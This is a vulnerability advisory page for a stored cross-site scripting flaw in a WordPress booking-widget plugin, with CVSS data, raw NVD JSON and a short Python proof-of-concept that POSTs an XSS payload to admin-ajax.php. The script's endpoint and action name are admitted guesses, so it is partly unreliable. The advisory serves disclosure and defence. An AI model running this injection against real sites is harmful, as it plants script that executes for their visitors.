Security Vulnerability Report
中文
CVE-2026-3003 CVSS 7.2 HIGH

CVE-2026-3003

Published: 2026-03-21 04:17:19
Last Modified: 2026-04-24 16:27:44
Source: [email protected]

Description

The Vagaro Booking Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘vagaro_code’ parameter in all versions up to, and including, 0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Vagaro Booking Widget <= 0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit_stored_xss(target_url): """ PoC for CVE-2026-3003: Stored XSS in Vagaro Booking Widget """ # Target endpoint (example, actual endpoint may vary based on plugin implementation) endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Malicious payload to inject xss_payload = "<img src=x onerror=alert('CVE-2026-3003')>" # Data payload to be sent via POST request post_data = { "action": "vagaro_save_widget_settings", "vagaro_code": xss_payload } try: response = requests.post(endpoint, data=post_data) if response.status_code == 200: print("[+] Payload injected successfully!") print("[+] Check the page that renders the 'vagaro_code' to see the alert.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") # Usage # exploit_stored_xss("http://target-wordpress-site.com")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3003", "sourceIdentifier": "[email protected]", "published": "2026-03-21T04:17:18.623", "lastModified": "2026-04-24T16:27:44.277", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Vagaro Booking Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘vagaro_code’ parameter in all versions up to, and including, 0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}, {"lang": "es", "value": "El plugin Vagaro Booking Widget para WordPress es vulnerable a cross-site scripting almacenado a través del parámetro 'vagaro_code' en todas las versiones hasta la 0.3, inclusive, debido a una sanitización de entrada y un escape de salida insuficientes. Esto permite que atacantes no autenticados inyecten scripts web arbitrarios en páginas que se ejecutarán cada vez que un usuario acceda a una página inyectada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/vagaro-booking-widget/trunk/vagaro-booking-widget.php#L104", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/vagaro-booking-widget/trunk/vagaro-booking-widget.php#L230", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7a480473-ceae-4621-9b13-e0f0543c57e3?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.